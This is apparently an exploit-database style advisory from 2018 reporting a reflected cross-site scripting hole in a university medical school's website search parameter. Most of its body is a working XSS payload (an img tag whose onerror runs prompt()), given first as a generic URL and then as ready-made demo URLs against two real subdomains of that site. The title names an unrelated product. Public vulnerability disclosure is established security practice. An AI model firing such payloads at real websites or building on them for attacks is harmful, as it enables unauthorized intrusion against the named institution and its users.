# Exploit title: casio - Cross Site Scripting ( XSS ) Vulnerability 
# Date: 2018-03-19 
# Exploit Author: Elsfa7-110 ( https://www.facebook.com/elsfa7110 ) 
Vendor Homepage: https://med.virginia.edu/
# Category: Web Application 
# Dork: N/A 
# ============================= 
# Description: 
# I discovered a XSS vulnerability in med.virginia.edu This vulnerability allows bad guy executes javascript commands on 
# target. In this target, attacker can enter his javascript command through url. like this : 
# http://Server/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>
#============================= Demo :  
https://med.virginia.edu/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>
================
https://technology.med.virginia.edu/?cx=009548005491705796603%3AWMX1307513326&q="><img src=https://pbs.twimg.com/profile_images/805910513037221888/HqPIq7-A_400x400.jpg onerror=prompt("Elsfa7-110");>